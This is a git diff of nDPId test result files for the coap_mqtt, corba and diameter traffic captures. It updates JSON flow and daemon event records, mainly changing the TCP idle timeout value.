+00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1922,"flow_first_seen":1455907243976,"flow_last_seen":1455907286855,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":61604,"flow_avg_l4_payload_len":32,"midstream":1,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53522,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} +00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1926,"flow_first_seen":1455907258332,"flow_last_seen":1455907286855,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":61604,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53523,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} +00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":1919,"flow_first_seen":1455907271483,"flow_last_seen":1455907286855,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":61604,"flow_avg_l4_payload_len":32,"midstream":1,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.101","dst_ip":"192.168.56.1","src_port":17501,"dst_port":53524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} +00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1928,"flow_first_seen":1455907267002,"flow_last_seen":1455907286845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":61855,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53528,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} 00566{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","packets-captured":8516,"packets-processed":8514,"total-skipped-flows":0,"total-l4-data-len":294179,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":16,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":16,"total-idle-flows":16,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":91,"global_ts_msec":1455907286855} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 8516/8514 diff --git a/test/results/corba.pcap.out b/test/results/corba.pcap.out index 255ac12a8..bec1da37b 100644 --- a/test/results/corba.pcap.out +++ b/test/results/corba.pcap.out @@ -1,23 +1,23 @@ 00456{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"corba.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00542{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"corba.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1614768020788} -00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614768020789,"flow_last_seen":1614768020789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614768020789,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8726,"dst_port":900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614768020789,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614768020789,"pkt":"5kBKB+riApXG95NLCABFAAAwnOsAAIAGAAAKZQACCmYAAiIWA4SwjQfnAAAAAHACgAEU8QAAAgQFtAMDAQA="} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614768020790,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614768020790,"pkt":"ApXG95NL5kBKB+riCABFAAAwnN4AAH8GihsKZgACCmUAAgOEIhawjRxgsI0H6HASgAFEQgAAAgQFtAMDAQA="} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614768020790,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614768020790,"pkt":"5kBKB+riApXG95NLCABFAAAonOwAAIAGAAAKZQACCmYAAiIWA4SwjQfosI0cYVAQgAEU6QAAAAAAAAAA"} -00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614768020789,"flow_last_seen":1614768020790,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1614768020790,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8726,"dst_port":900,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}} -00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614768020792,"flow_last_seen":1614768020792,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614768020792,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8727,"dst_port":1049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1614768020792,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614768020792,"pkt":"5kBKB+riApXG95NLCABFAAAwnO8AAIAGAAAKZQACCmYAAiIXBBmwjThoAAAAAHACgAEU8QAAAgQFtAMDAQA="} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1614768020793,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614768020793,"pkt":"ApXG95NL5kBKB+riCABFAAAwnOEAAH8GihgKZgACCmUAAgQZIhewjUFJsI04aXASgAHuQQAAAgQFtAMDAQA="} -00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1614768020793,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614768020793,"pkt":"5kBKB+riApXG95NLCABFAAAonPAAAIAGAAAKZQACCmYAAiIXBBmwjThpsI1BSlAQgAEU6QAAAAAAAAAA"} -00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614768020792,"flow_last_seen":1614768020793,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1614768020793,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8727,"dst_port":1049,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}} -00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614768020794,"flow_last_seen":1614768020794,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614768020794,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8728,"dst_port":61191,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1614768020794,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614768020794,"pkt":"5kBKB+riApXG95NLCABFAAAwnPQAAIAGAAAKZQACCmYAAiIY7wewjV4NAAAAAHACgAEU8QAAAgQFtAMDAQA="} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1614768020795,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614768020795,"pkt":"ApXG95NL5kBKB+riCABFAAAwnOUAAH8GihQKZgACCmUAAu8HIhiwjWV0sI1eDnASgAG5gQAAAgQFtAMDAQA="} -00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1614768020795,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614768020795,"pkt":"5kBKB+riApXG95NLCABFAAAonPUAAIAGAAAKZQACCmYAAiIY7wewjV4OsI1ldVAQgAEU6QAAAAAAAAAA"} -00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614768020794,"flow_last_seen":1614768020795,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":322,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1614768020795,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8728,"dst_port":61191,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}} -00668{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":25,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1614768020789,"flow_last_seen":1614768020792,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":494,"flow_tot_l4_payload_len":762,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1614768020795,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8726,"dst_port":900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}} -00670{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":25,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1614768020792,"flow_last_seen":1614768020794,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":1047,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1614768020795,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8727,"dst_port":1049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}} -00669{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":25,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1614768020794,"flow_last_seen":1614768020795,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":322,"flow_tot_l4_payload_len":588,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1614768020795,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8728,"dst_port":61191,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}} +00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614768020789,"flow_last_seen":1614768020789,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614768020789,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8726,"dst_port":900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614768020789,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614768020789,"pkt":"5kBKB+riApXG95NLCABFAAAwnOsAAIAGAAAKZQACCmYAAiIWA4SwjQfnAAAAAHACgAEU8QAAAgQFtAMDAQA="} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614768020790,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614768020790,"pkt":"ApXG95NL5kBKB+riCABFAAAwnN4AAH8GihsKZgACCmUAAgOEIhawjRxgsI0H6HASgAFEQgAAAgQFtAMDAQA="} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614768020790,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614768020790,"pkt":"5kBKB+riApXG95NLCABFAAAonOwAAIAGAAAKZQACCmYAAiIWA4SwjQfosI0cYVAQgAEU6QAAAAAAAAAA"} +00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614768020789,"flow_last_seen":1614768020790,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1614768020790,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8726,"dst_port":900,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}} +00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614768020792,"flow_last_seen":1614768020792,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614768020792,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8727,"dst_port":1049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1614768020792,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614768020792,"pkt":"5kBKB+riApXG95NLCABFAAAwnO8AAIAGAAAKZQACCmYAAiIXBBmwjThoAAAAAHACgAEU8QAAAgQFtAMDAQA="} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1614768020793,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614768020793,"pkt":"ApXG95NL5kBKB+riCABFAAAwnOEAAH8GihgKZgACCmUAAgQZIhewjUFJsI04aXASgAHuQQAAAgQFtAMDAQA="} +00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1614768020793,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614768020793,"pkt":"5kBKB+riApXG95NLCABFAAAonPAAAIAGAAAKZQACCmYAAiIXBBmwjThpsI1BSlAQgAEU6QAAAAAAAAAA"} +00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614768020792,"flow_last_seen":1614768020793,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1614768020793,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8727,"dst_port":1049,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}} +00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614768020794,"flow_last_seen":1614768020794,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614768020794,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8728,"dst_port":61191,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1614768020794,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614768020794,"pkt":"5kBKB+riApXG95NLCABFAAAwnPQAAIAGAAAKZQACCmYAAiIY7wewjV4NAAAAAHACgAEU8QAAAgQFtAMDAQA="} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1614768020795,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614768020795,"pkt":"ApXG95NL5kBKB+riCABFAAAwnOUAAH8GihQKZgACCmUAAu8HIhiwjWV0sI1eDnASgAG5gQAAAgQFtAMDAQA="} +00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1614768020795,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614768020795,"pkt":"5kBKB+riApXG95NLCABFAAAonPUAAIAGAAAKZQACCmYAAiIY7wewjV4OsI1ldVAQgAEU6QAAAAAAAAAA"} +00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614768020794,"flow_last_seen":1614768020795,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":322,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1614768020795,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8728,"dst_port":61191,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}} +00668{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":25,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1614768020789,"flow_last_seen":1614768020792,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":494,"flow_tot_l4_payload_len":762,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1614768020795,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8726,"dst_port":900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}} +00670{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":25,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1614768020792,"flow_last_seen":1614768020794,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":1047,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1614768020795,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8727,"dst_port":1049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}} +00669{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":25,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1614768020794,"flow_last_seen":1614768020795,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":322,"flow_tot_l4_payload_len":588,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1614768020795,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8728,"dst_port":61191,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}} 00551{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":25,"source":"corba.pcap","alias":"nDPId-test","packets-captured":25,"packets-processed":22,"total-skipped-flows":0,"total-l4-data-len":2397,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":21,"global_ts_msec":1614768020795} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 25/22 diff --git a/test/results/diameter.pcap.out b/test/results/diameter.pcap.out index 51f7c4c3e..acf7b7fec 100644 --- a/test/results/diameter.pcap.out +++ b/test/results/diameter.pcap.out @@ -1,11 +1,11 @@ 00459{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"diameter.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"diameter.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1263278878271} 